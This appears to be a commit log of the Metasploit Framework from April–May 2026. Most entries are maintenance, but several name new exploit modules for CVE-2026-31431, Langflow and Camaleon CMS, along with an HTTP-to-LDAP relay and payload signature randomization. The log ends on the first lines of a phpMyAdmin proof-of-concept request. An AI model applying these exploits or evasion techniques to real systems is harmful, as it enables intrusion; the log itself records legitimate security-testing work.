Compare commits

...

206 Commits

Author SHA1 Message Date
jenkins-metasploit bc5347f464 automatic module_metadata_base.json update
Command Shell Acceptance / cmd windows-2022 (push) Waiting to run
Command Shell Acceptance / linux ubuntu-latest (push) Waiting to run
Command Shell Acceptance / powershell windows-2025 (push) Waiting to run
Command Shell Acceptance / Generate report (push) Blocked by required conditions
LDAP Acceptance / LDAP Acceptance - ubuntu-latest - Ruby 3.2 (push) Waiting to run
LDAP Acceptance / Generate report (push) Blocked by required conditions
Lint / Lint msftidy (3.2) (push) Waiting to run
Meterpreter Acceptance / build (push) Waiting to run
MSSQL Acceptance / mcr.microsoft.com/mssql/server:2019-latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MSSQL Acceptance / mcr.microsoft.com/mssql/server:2022-latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MSSQL Acceptance / Generate report (push) Blocked by required conditions
MySQL Acceptance / mariadb:latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MySQL Acceptance / mysql:latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MySQL Acceptance / Generate report (push) Blocked by required conditions
Postgres Acceptance / postgres:16.2 - ubuntu-latest - Ruby 3.2 (push) Waiting to run
Postgres Acceptance / postgres:9.4 - ubuntu-latest - Ruby 3.2 (push) Waiting to run
Postgres Acceptance / Generate report (push) Blocked by required conditions
SMB Acceptance / build (push) Waiting to run
Verify / Docker Build (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
2026-05-04 13:49:03 +00:00
Diego Ledda edb6844c8f Merge pull request #21404 from zeroSteiner/feat/cve-2026-31431
Fix ARMLE exec and add to Copy Fail
2026-05-04 09:37:28 -04:00
jenkins-metasploit 909c8df2cf automatic module_metadata_base.json update 2026-05-01 13:50:15 +00:00
adfoster-r7 bbb2452063 Merge pull request #21342 from adfoster-r7/defer-loading-dependencies
Defer loading rex/metasm/octokit/etc dependencies
2026-05-01 14:37:27 +01:00
Spencer McIntyre 0c81638fff Fix ARMLE exec and add to Copy Fail 2026-04-30 20:03:04 -04:00
adfoster-r7 557ff0d068 Defer loading dependencies 2026-05-01 00:07:59 +01:00
jenkins-metasploit 5a2e7bb301 Bump version of framework to 6.4.132 2026-04-30 23:06:36 +00:00
jenkins-metasploit e8bb3cd5fb automatic module_metadata_base.json update 2026-04-30 22:30:05 +00:00
Brendan dc97d1e97e Merge pull request #21395 from zeroSteiner/feat/cve-2026-31431
Add exploit for CVE-2026-31431 (Copy Fail)
2026-04-30 17:19:08 -05:00
Spencer McIntyre 66995d3987 Only allow x64 and AARCH64 for now 2026-04-30 17:51:30 -04:00
Spencer McIntyre cdcdb5fe88 Normalize reported ARMLE architectures from Meterpreter 2026-04-30 17:09:33 -04:00
Spencer McIntyre bc0f7602c2 Only bind the socket once 2026-04-30 17:09:32 -04:00
Spencer McIntyre 0e02f10078 Add support for more architectures 2026-04-30 17:09:32 -04:00
Spencer McIntyre c0e5ceb531 Add an AARCH64 exec payload 2026-04-30 17:09:32 -04:00
Spencer McIntyre a0c5b9a6bc Merge pull request #21315 from cdelafuente-r7/mcp-server
MCP Server, specs and documentation
2026-04-30 16:33:18 -04:00
Spencer McIntyre e14ce079bb Appease rubocop 2026-04-30 15:18:18 -04:00
Spencer McIntyre 22a9dc4522 Add docs 2026-04-30 14:54:09 -04:00
Spencer McIntyre 55f9216698 Finish the exploit check and cleanup methods 2026-04-30 14:39:46 -04:00
jenkins-metasploit e2e210d038 automatic module_metadata_base.json update 2026-04-30 15:40:08 +00:00
cgranleese-r7 a2b57ae998 Merge pull request #21352 from adfoster-r7/improve-checkcode-messages-5
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 16:29:07 +01:00
Spencer McIntyre 12e08fb451 Add an expanded check 2026-04-30 10:54:17 -04:00
adfoster-r7 3bee31ff5e Update checkcodes and bug fixes 2026-04-30 15:42:10 +01:00
Spencer McIntyre d0a205f776 Add the initial LPE exploit 2026-04-30 09:53:35 -04:00
Spencer McIntyre 9f6349de7d Initial commit of updated stub
Stub has been updated to forward arguments to /bin/sh
2026-04-30 09:53:12 -04:00
jenkins-metasploit 5942122b9a automatic module_metadata_base.json update 2026-04-30 10:06:45 +00:00
cgranleese-r7 49ea1a3391 Merge pull request #21359 from adfoster-r7/improve-checkcode-messages-12
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:46:41 +01:00
cgranleese-r7 b3fbeced43 Merge pull request #21355 from adfoster-r7/improve-checkcode-messages-8
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:44:04 +01:00
cgranleese-r7 7b3aef8ede Merge pull request #21353 from adfoster-r7/improve-checkcode-messages-6
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:43:21 +01:00
Christophe De La Fuente 6f3884e832 Redesign the logging capability using Rex::Logging and Rake middleware
- remove the original Logger
- use Rex::Logging with helper methods (dlog, ilog, etc.)
- add `sanitize` configuration option
- create Sanitizing, JsonFlatfile and JsonStream sinks for JSON logging format
- minor updates in apply_default (Loader)
- update the re-authentication logic (fix a specific usecase)
- add a Rack middleware that logs MCP HTTP request/response
- use Rex::Socket::Tcp instead of TcpSocket
- update the ensure_rpc_available for better validation
- use around_request instead of the deprecated SDK instrumentation for logging
- update and add specs
2026-04-30 11:10:09 +02:00
adfoster-r7 b59ced5057 Add human-readable descriptions to CheckCode returns in multi/http exploit modules (A-O) 2026-04-30 00:25:30 +01:00
adfoster-r7 0bf595c2ec Add human-readable descriptions to CheckCode returns in unix/webapp exploit modules 2026-04-30 00:16:04 +01:00
jenkins-metasploit 15a0f6eefd automatic module_metadata_base.json update 2026-04-29 19:30:36 +00:00
Spencer McIntyre 2634142f0d Merge pull request #21323 from jheysel-r7/feat/http_to_ldap
HTTP to LDAP Relay Module
2026-04-29 15:20:10 -04:00
Spencer McIntyre 2153daad7b Update the specs 2026-04-29 14:38:29 -04:00
Jack Heysel 4847d88441 HTTP to LDAP Relay Module and Supporting Libraries
Remove unnecessary code

Remove commented out code

Added documentation

Responded to Spencer and Copilot

Add anonymous identity check

Doc update

Warning surpression

Renamed ldap_client to relayed_connection

Comments
2026-04-29 07:48:42 -07:00
jenkins-metasploit 788aa2abc5 automatic module_metadata_base.json update 2026-04-29 13:18:45 +00:00
Spencer McIntyre 2cfdfcba60 Merge pull request #21392 from dwelch-r7/skip-windows-test-on-non-windows-system
skip Windows-specific tests on non-Windows platforms
2026-04-29 09:08:03 -04:00
dwelch-r7 bcae34ee4f Update test/modules/post/test/cmd_exec.rb
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
2026-04-29 13:11:06 +01:00
Dean Welch 6df54a639e skip Windows-specific tests on non-Windows platforms 2026-04-29 13:05:17 +01:00
jenkins-metasploit 41a937c70c automatic module_metadata_base.json update 2026-04-27 11:20:38 +00:00
adfoster-r7 63f4f358c7 Merge pull request #21092 from sjanusz-r7/fix-macos-mingw-syscall_inject-compilation
Fix syscall_inject compilation errors on MacOS with MinGW 15
2026-04-27 12:09:19 +01:00
adfoster-r7 1e3727ba87 Add human-readable descriptions to CheckCode returns in remaining multi exploit modules 2026-04-25 10:52:11 +01:00
jenkins-metasploit e909b9218b Bump version of framework to 6.4.131 2026-04-25 08:54:14 +00:00
adfoster-r7 d121ff6a62 Merge pull request #21307 from adfoster-r7/improve-vuln-and-vuln-attempt-tracking
Improve vuln and vuln attempt tracking
2026-04-24 18:36:28 +01:00
adfoster-r7 e00515c172 Update logic for aux modules having called report_vuln already 2026-04-24 16:26:49 +01:00
adfoster-r7 3ecbadd032 Improve vuln and vuln attempt tracking 2026-04-24 16:26:49 +01:00
cgranleese-r7 7c4f15a024 Merge pull request #21354 from adfoster-r7/improve-checkcode-messages-7
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 16:13:19 +01:00
adfoster-r7 7479078bf1 Merge pull request #21356 from adfoster-r7/improve-checkcode-messages-9
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:45 +01:00
adfoster-r7 b09686efaf Merge pull request #21357 from adfoster-r7/improve-checkcode-messages-10
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:19 +01:00
adfoster-r7 b765db798e Merge pull request #21358 from adfoster-r7/improve-checkcode-messages-11
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:00 +01:00
Simon Janusz aa14df9b6c Merge pull request #21368 from sjanusz-r7/change-php-payload-size
Change PHP payload die func message
2026-04-24 13:47:19 +01:00
adfoster-r7 1d1c284619 Merge pull request #21364 from sjanusz-r7/update-payload-cached-sizes-on-new-metadata-cache
Update payload cached sizes when creating new module metadata cache
2026-04-24 11:15:55 +01:00
sjanusz-r7 a153814b0f Change PHP payload die func message 2026-04-24 11:08:38 +01:00
jenkins-metasploit 17f7f4d718 Bump version of framework to 6.4.130 2026-04-23 15:02:38 +00:00
jenkins-metasploit 74468290c9 automatic module_metadata_base.json update 2026-04-23 14:54:17 +00:00
Spencer McIntyre 540139cd4a Merge pull request #21341 from g0tmi1k/smb
Fix various smb/samba issues
2026-04-23 10:45:58 -04:00
adfoster-r7 370c35c1e2 Add human-readable descriptions to CheckCode returns in windows/http exploit modules 2026-04-23 15:37:09 +01:00
jenkins-metasploit cb1cfbbe98 automatic module_metadata_base.json update 2026-04-23 14:21:28 +00:00
Brendan 2289fc07ce Merge pull request #21260 from Takahiro-Yoko/langflow_rce_cve_2026_27966
Add Langflow RCE module (CVE-2026-27966)
2026-04-23 09:12:12 -05:00
cgranleese-r7 107edff1cb Merge pull request #21278 from adfoster-r7/fix-msftidy-heading-in-codeblock-edgecase
Fix msftidy heading in codeblock edgecase
2026-04-23 13:23:55 +01:00
jenkins-metasploit 4521c9f3d3 automatic module_metadata_base.json update 2026-04-23 12:03:13 +00:00
g0t mi1k 76cae04e91 smb_login: Add report_service (regardless of RECORD_GUEST)
RECORD_GUEST = creds, not service
2026-04-23 12:59:19 +01:00
g0t mi1k 4f77df25ba smb_uninit_cred: Add report_service 2026-04-23 12:59:19 +01:00
g0t mi1k 792a4254ac smb_uninit_cred: Print correct port 2026-04-23 12:59:19 +01:00
g0t mi1k eb5b5a1277 smb_uninit_cred: Rex::Proto::DCERPC::Exceptions::Fault DCERPC FAULT => nca_op_rng_error 2026-04-23 12:59:18 +01:00
g0t mi1k 950fb9def6 smb_lookupsid: Hide table if results empty 2026-04-23 12:59:18 +01:00
g0t mi1k 2e58eb1207 psexec_loggedin_users: NoMethodError. undefined method `each_line' for false 2026-04-23 12:59:18 +01:00
g0t mi1k a173ea15fa smb_version: Remove duplicated report_service 2026-04-23 12:59:18 +01:00
g0t mi1k 3c1b245751 Fix #21339: NoMethodError undefined method `each' for an instance of String 2026-04-23 12:59:18 +01:00
g0t mi1k ca27731285 Fix #21338: NoMethodError undefined method `domain_handle' for nil 2026-04-23 12:59:18 +01:00
g0t mi1k 2d93669f56 Fix #21337: NoMethodError' 'undefined method `empty?' for nil 2026-04-23 12:59:18 +01:00
cgranleese-r7 1142d4e15d Merge pull request #21351 from adfoster-r7/improve-checkcode-messages-4
Add human-readable descriptions to CheckCode returns modules
2026-04-23 12:54:31 +01:00
adfoster-r7 96a37da14a Add human-readable descriptions to CheckCode returns in multi/http exploit modules (P-Z) 2026-04-23 12:26:32 +01:00
sjanusz-r7 f00bbe6451 Update payload cached sizes when creating new module metadata cache 2026-04-23 12:06:09 +01:00
jenkins-metasploit f1778187b8 automatic module_metadata_base.json update 2026-04-23 11:04:15 +00:00
cgranleese-r7 9ad8b7ac32 Merge pull request #21360 from adfoster-r7/improve-checkcode-messages-13
Add human-readable descriptions to CheckCode returns in modules
2026-04-23 11:55:46 +01:00
jenkins-metasploit 8a5d7be47a automatic module_metadata_base.json update 2026-04-23 10:45:19 +00:00
cgranleese-r7 591dbdd821 Merge pull request #21350 from adfoster-r7/improve-checkcode-messages-3
Add human-readable descriptions to CheckCode returns in modules
2026-04-23 11:33:27 +01:00
adfoster-r7 c38f6b4858 Update checkcodes and bug fixes 2026-04-23 10:20:53 +01:00
adfoster-r7 3e61396ec2 Add human-readable descriptions to CheckCode returns in unix, freebsd, osx, and other exploit modules 2026-04-23 10:02:22 +01:00
jenkins-metasploit e5bdc50a4f automatic module_metadata_base.json update 2026-04-22 20:35:33 +00:00
Spencer McIntyre 44d60c0865 Merge pull request #21347 from g0tmi1k/smb_version
smb_version: Make SMBv1 happy
2026-04-22 16:27:08 -04:00
adfoster-r7 2ae936473e Add human-readable descriptions to CheckCode returns in remaining windows exploit modules 2026-04-22 18:44:55 +01:00
adfoster-r7 45bc95a876 Add human-readable descriptions to CheckCode returns in windows/local exploit modules 2026-04-22 18:43:59 +01:00
adfoster-r7 aaf536d189 Merge pull request #21361 from sjanusz-r7/payload-cache-size-changes
Comment out payload size cache tests
2026-04-22 17:13:23 +01:00
sjanusz-r7 8587d1c211 Skip payload cached size specs 2026-04-22 16:31:51 +01:00
adfoster-r7 05befe18b1 Add human-readable descriptions to CheckCode returns in linux/local exploit modules 2026-04-22 15:06:59 +01:00
jenkins-metasploit 7851cda71d automatic module_metadata_base.json update 2026-04-22 13:49:02 +00:00
cgranleese-r7 380911db97 Merge pull request #21349 from adfoster-r7/improve-checkcode-messages-2
Add human-readable descriptions to CheckCode returns in modules
2026-04-22 14:32:05 +01:00
cgranleese-r7 de636c1457 Merge pull request #21348 from adfoster-r7/improve-checkcode-messages-1
Add human-readable descriptions to CheckCode returns in modules
2026-04-22 14:30:48 +01:00
adfoster-r7 f3b07d5a49 Add human-readable descriptions to CheckCode returns in auxiliary and post modules 2026-04-22 13:56:54 +01:00
adfoster-r7 2cbb3942b6 Add human-readable descriptions to CheckCode returns in linux/http exploit modules (A-M) 2026-04-22 13:08:59 +01:00
g0t mi1k b7f136077e smb_version: Be more verbose - show smb1 if possible 2026-04-22 13:08:20 +01:00
g0t mi1k 0474c0ce24 smb_version: Add spacing between : 2026-04-22 13:08:20 +01:00
g0t mi1k 1d9c922488 Make smb_version happy with smbv1 2026-04-22 13:08:19 +01:00
cgranleese-r7 25d7c25ad8 Merge pull request #21346 from adfoster-r7/fix-false-positive-on-couchdb-enum-check
Fix false positive on couchdb enum check
2026-04-22 12:38:47 +01:00
adfoster-r7 19d333df13 Add human-readable descriptions to CheckCode returns in linux/http exploit modules (N-Z) 2026-04-22 11:55:15 +01:00
adfoster-r7 6e992aa6ed Fix false positive on couchdb enum check 2026-04-21 22:48:27 +01:00
jenkins-metasploit 9efc727462 automatic module_metadata_base.json update 2026-04-21 17:21:45 +00:00
Christophe De La Fuente 4c0f2c29bc Merge pull request #21019 from g0tmi1k/phpmyadmin_config 2026-04-21 19:13:04 +02:00
jenkins-metasploit 9692b8865f automatic module_metadata_base.json update 2026-04-21 17:08:11 +00:00
Spencer McIntyre 6a00ea38c6 Merge pull request #21306 from dledda-r7/feat/block-api-randomization
Block Api ROR13 IV randomization
2026-04-21 12:58:30 -04:00
Christophe De La Fuente 946d1a44b5 Fix Notes format (array) 2026-04-21 18:43:54 +02:00
jenkins-metasploit cca7166eb4 automatic module_metadata_base.json update 2026-04-21 15:05:42 +00:00
adfoster-r7 a918184416 Merge pull request #21344 from adfoster-r7/fix-elasticsearch-traversal-check-support
Fix elasticsearch traversal check support
2026-04-21 15:57:26 +01:00
adfoster-r7 81f1a7c86a Fix elasticsearch traversal check support 2026-04-21 15:18:58 +01:00
adfoster-r7 97ab01cddd Merge pull request #21340 from dledda-r7/ci/disable-meterpreter-ci
Disable Windows Server 2022 CI
2026-04-21 15:01:35 +01:00
dledda-r7 b9573fa0ce ops(meterpreter): disable windows server 2022 build until 141_xp dependency is removed 2026-04-21 05:55:29 -04:00
dledda-r7 e40422845b fix: block_api.rb update 2026-04-21 05:43:34 -04:00
Spencer McIntyre 20065b3f3d Fix the include errors 2026-04-20 18:36:00 -04:00
Spencer McIntyre 44a45ffdbf Switch to Rex::Logging 2026-04-20 18:14:56 -04:00
Brendan 2dbfcfb918 Merge pull request #21232 from bcoles/file-find_writable_directories
Add find_writable_directories to Msf::Post::File
2026-04-20 16:33:53 -05:00
jenkins-metasploit ae63cb9b1d automatic module_metadata_base.json update 2026-04-20 20:41:14 +00:00
Brendan 6b57b4c66f Merge pull request #21256 from g0tmi1k/webdav
WebDAV improvements
2026-04-20 15:30:43 -05:00
Christophe De La Fuente 820e737024 Update from code review and some fixes
- add the `--mcp-transport` option
- prefix the MCP env. variable with `MSF_`
- move the code under `lib/msf/core/mcp/`
- move specs under `spec/lib/msf/core/mcp/`
- change the namespace from `MsfMcp` to `Msf::RPC`
- update the `lib/msf_autoload.rb` to exclude the mcp-related files
- add missing validation for the `mcp`, `rate_limit and `logging` sections in the config file
- remove duplicate error exception classes
- fix an error in the transformers related to the `created_at` field
- fix a small issue in the input validator when regex are used
- update the way error is reported for MCP Tools to be compatible with the changes in the new `mcp` gem
- update and add specs
2026-04-20 18:29:21 +02:00
adfoster-r7 bd2e11ad55 Merge pull request #21331 from bcoles/metadata-obj
Metadata::Obj: Deduplicate notes hash strings and memoize `Obj#path` to reduce retained memory in the module metadata cache
2026-04-20 16:55:33 +01:00
jenkins-metasploit 6acac8e120 automatic module_metadata_base.json update 2026-04-20 13:31:53 +00:00
cgranleese-r7 a53d0a027b Merge pull request #21332 from adfoster-r7/remove-false-positive-from-nodejs-pipelining-check
Remove false positive from nodejs pipelining check
2026-04-20 14:22:23 +01:00
Diego Ledda 46553b5984 Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:19:47 +02:00
Diego Ledda 5622bd254b Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:19:07 +02:00
Diego Ledda 2c58825343 Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:18:54 +02:00
adfoster-r7 f060acd1e9 Remove false positive from nodejs pipelining check 2026-04-20 14:02:56 +01:00
bcoles 09bb98d13e Memoize Obj#path to avoid repeated File.join
The install_root path is immutable at runtime, so cache the computed
full path on first access instead of calling File.join on every call.
2026-04-20 22:19:55 +10:00
bcoles 76a7f61465 Deduplicate notes hash keys and values in metadata Obj
Notes keys ("Stability", "SideEffects", "Reliability") and values
("crash-safe", "ioc-in-logs", etc.) are repeated across thousands of
modules. Use frozen string dedup (-str) to share a single object per
unique string, reducing ~24K string allocations to ~185 shared objects.
2026-04-20 22:17:40 +10:00
adfoster-r7 e09a38085c Merge pull request #21330 from bcoles/modules-loader
Replace Pathname with string prefix removal in directory module loader
2026-04-20 11:45:33 +01:00
adfoster-r7 fe1aeb9279 Merge pull request #21329 from bcoles/modulemanager-cache
Simplify get_parent_path with rindex instead of split/join
2026-04-20 11:30:04 +01:00
adfoster-r7 9b985dc1ef Merge pull request #21327 from tair-m/master
Fix uninitialized constant HTTP::CookieJar by correcting load order in http_cookie_jar.rb
2026-04-20 10:39:02 +01:00
bcoles a8ccdfc1e4 Simplify get_parent_path with rindex instead of split/join
Replace File.join + String#split + array slice + Array#join with a
single String#rindex lookup. This avoids allocating intermediate arrays
and strings on every call (once per cached module during startup).
2026-04-20 18:22:53 +10:00
bcoles b1c4fd3f39 Replace Pathname with string prefix removal in directory module loader
Msf::Modules::Loader::Directory#each_module_reference_name created two
Pathname objects per module file and called relative_path_from to derive
the module reference name. With ~5,000 module files this produced
~170,000 calls to Pathname#chop_basename internally.

Since Rex::Find.find always yields absolute paths rooted at
full_entry_path, simple String#delete_prefix achieves the same result
without allocating Pathname objects.
2026-04-20 18:14:54 +10:00
Takah1ro f54374eaff Update exploit to improve stability 2026-04-18 12:56:53 +09:00
tair 4607741a16 Fix LoadError in http_cookie_jar for Ruby 3.3.0 2026-04-18 07:17:26 +05:00
g0t mi1k 94b4f577e0 WebDAV: MR feedback 2026-04-17 22:19:26 +01:00
jenkins-metasploit 046ba861b3 automatic module_metadata_base.json update 2026-04-17 16:21:38 +00:00
jheysel-r7 08f6dc20a5 Merge pull request #21122 from bootstrapbool/camaleon_cms_cve_2024_46987
Camaleon CMS CVE 2024 46987
2026-04-17 09:13:07 -07:00
Takah1ro a47234778c Increase WfsDelay 2026-04-17 23:54:43 +09:00
adfoster-r7 92af54c885 Merge pull request #21230 from bcoles/obj-dedup-cache
Reduce memory footprint of module metadata Obj instances
2026-04-17 12:33:23 +01:00
adfoster-r7 19112a0212 Merge pull request #21231 from bcoles/msf-module-cache
Module metadata: Fix stale module detection and add per-type metadata index
2026-04-17 11:25:44 +01:00
dledda-r7 679d2a9a4e feat: enhance block_api_iv handling with warnings and options for payload methods 2026-04-17 06:07:18 -04:00
bcoles 785307f55e Module metadata: Fix stale module detection and add per-type metadata index 2026-04-17 19:41:18 +10:00
dledda-r7 82c8028f1c refactor: remove redundant block_api_iv calls in payload generation methods 2026-04-17 05:38:19 -04:00
Diego Ledda 9d81fe0f2e Apply suggestion from @smcintyre-r7
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-17 11:26:11 +02:00
Diego Ledda b3ef4db890 Apply suggestion from @smcintyre-r7
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-17 11:25:14 +02:00
Diego Ledda 2af3bbf34e Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-17 11:23:28 +02:00
Takah1ro 3cfbb90b0f Fix bug 2026-04-17 07:31:25 +09:00
Takahiro Yokoyama 4c5ed36c88 Update modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2026-04-17 07:10:53 +09:00
Christophe De La Fuente 04ffe3ce3b MCP Server, specs and documentation 2026-04-16 19:31:35 +02:00
bcoles 6821066217 Add find_writable_directories to Msf::Post::File
Add a method to discover writable directories on Unix targets using the
`find` command. This is useful in post-exploitation scenarios where a
module needs to locate a writable staging path.

Parameters:
- path: base directory to search (default: /)
- max_depth: find -maxdepth limit (default: 2)
- timeout: maximum seconds for cmd_exec to wait (default: 15)

Raises on Windows sessions. Returns an array of absolute paths, or nil
on failure. Non-absolute lines (e.g. find error messages) are filtered
from the output.
2026-04-17 02:31:19 +10:00
jenkins-metasploit 37ff9f8530 automatic module_metadata_base.json update 2026-04-16 16:00:17 +00:00
adfoster-r7 e7c5e0e4a3 Merge pull request #21238 from bcoles/loongarch64-chmod
Add Linux LoongArch64 chmod payload
2026-04-16 16:51:00 +01:00
adfoster-r7 0644f27cb6 Add module documentation, tests, and misc feedback 2026-04-16 16:18:46 +01:00
jenkins-metasploit 2b37cbe35e Bump version of framework to 6.4.129 2026-04-16 13:29:17 +00:00
Takah1ro 4973d666ff Relocate json to an external file 2026-04-16 21:57:07 +09:00
dledda-r7 953d0343dd fix: updated cache size after blockapi changes 2026-04-16 08:50:42 -04:00
dledda-r7 a50041b697 feat: update register usage for block API calls to use r10d in various payloads 2026-04-16 08:37:32 -04:00
Takahiro Yokoyama b917de89c3 Merge branch 'rapid7:master' into langflow_rce_cve_2026_27966 2026-04-16 20:58:02 +09:00
dledda-r7 340a72438b feat: refactor exit function handling to use block_api_hash 2026-04-16 04:24:44 -04:00
dledda-r7 2be47dbe9c feat: change exitfunc_helper to be accessible 2026-04-16 04:24:44 -04:00
dledda-r7 b8f8366ff1 docs: adding small comment to call out block api randomization 2026-04-16 04:24:43 -04:00
dledda-r7 1f8bb3b52a feat: refactor exit function handling to use helper method for block api randomization 2026-04-16 04:24:43 -04:00
dledda-r7 3233e3c011 feat: block api iv randomization in PrependMigrate 2026-04-16 04:24:43 -04:00
dledda-r7 8a63392284 feat: block api randomization for x86 payloads 2026-04-16 04:24:42 -04:00
dledda-r7 a54f29f02b feat: block api randomization for x64 payloads 2026-04-16 04:24:42 -04:00
dledda-r7 ab0fdf96f8 feat: block api randomization for windows/x64/reverse_tcp 2026-04-16 04:24:41 -04:00
BootstrapBool d530230b5f Reflects module name change in documentation. 2026-04-15 16:16:16 -04:00
BootstrapBool f52184a566 Renames module
Places rails version check after downgrading concurrent-ruby
2026-04-15 16:07:15 -04:00
bootstrapbool 1bbfb699e1 Ensure curl
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-04-15 15:49:49 -04:00
bootstrapbool eddd3fecff Always output logs pertaining to version
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-04-15 15:48:40 -04:00
bootstrapbool 5d5896d3a1 Formatting Fix/Improvement 2026-04-14 19:18:54 +00:00
bootstrapbool fcdb16e69a Document setup process for Camaleon CMS 2026-04-14 19:12:56 +00:00
g0t mi1k 9f480e55d5 phpmyadmin_config: Misc feedback updates
Sorry its thrown all in a big commit and not splitting up.
2026-04-14 16:35:13 +01:00
g0t mi1k 71f37467d7 http_login: Make rubocop happy 2026-04-14 06:28:55 +01:00
g0t mi1k 3fea1d279d http_login: Be more verbose 2026-04-14 06:28:55 +01:00
g0t mi1k 8bb476a7f5 WebDAV: Misc formatting 2026-04-14 06:28:55 +01:00
g0t mi1k d2ea521ba3 WebDAV: Add check() function 2026-04-14 06:28:45 +01:00
adfoster-r7 9dbea3d5e2 Fix msftidy heading in codeblock edgecase 2026-04-13 13:51:28 +01:00
sjanusz-r7 4281e713a0 Fix syscall_inject compilation errors on MacOS with MinGW 15 2026-04-13 10:25:27 +01:00
BootstrapBool dc82a22939 Removes unnecessary print 2026-04-11 20:41:54 -04:00
BootstrapBool 8684cec986 Corrects check method 2026-04-11 20:28:28 -04:00
BootstrapBool d441c07408 Corrects documentation
Removes unnecessary options

Removes credentials from logs

Refactors check method

Makes use of Rex::Version

Removes get_base_url in favor of relative filepaths in send_request_cgi

Other small changes
2026-04-11 19:31:22 -04:00
Takah1ro 2f15039985 Lint formatting 2026-04-10 23:44:26 +09:00
Takah1ro 4dcf67865a minor change 2026-04-09 22:18:01 +09:00
Takah1ro a6d7502c8d Add langflow_rce_cve_2026_27966 module 2026-04-09 22:12:10 +09:00
g0t mi1k 4f38ec3393 WebDAV: Improve response 2026-04-08 17:03:16 +01:00
g0t mi1k 0f4db29f2b WebDAV: Creds is optional 2026-04-08 17:03:16 +01:00
g0t mi1k 328c2e5845 WebDAV: Update workspace 2026-04-08 17:03:16 +01:00
g0t mi1k 918281a5dc WebDAV: Clean up after exploiting 2026-04-08 17:03:16 +01:00
g0t mi1k 6603450572 WebDAV: PATH -> URI 2026-04-08 17:03:16 +01:00
g0t mi1k 2979dafdf4 WebDAV: Make rubocop happy 2026-04-08 17:03:07 +01:00
g0t mi1k 437b8a7cf6 WebDAV isn't just for Windows 2026-04-08 16:36:35 +01:00
bcoles 6ba950c526 Add Linux LoongArch64 chmod payload 2026-04-06 11:40:14 +10:00
bcoles 235da57b97 Module metadata: string dedup, shared empty containers, platform caching 2026-04-04 12:14:17 +11:00
bcoles 3ac30e09cc Module metadata: string dedup, shared empty containers, platform caching 2026-04-04 11:54:38 +11:00
g0t mi1k 38d8ea7937 phpmyadmin_config: Make rubocop happy 2026-03-31 14:49:03 +01:00
g0t mi1k e025f94f78 phpmyadmin_config: Add report_service() support 2026-03-31 07:07:49 +01:00
g0t mi1k 3a1d34e300 phpmyadmin_config: Ordering matters (check vs exploit) 2026-03-31 07:07:49 +01:00
g0t mi1k 18e4c8e28d phpmyadmin_config: Misc ruby format tweaks
This is based on MR feedback
2026-03-31 07:07:49 +01:00
g0t mi1k 8938ee75e5 phpmyadmin_config: Another <= v3.1.3.1 (CVE-2009-1285)
CVE-2009-1285 has two vulns for v3.1.x

## PoC

```
POST /setup/config.php?type=post HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
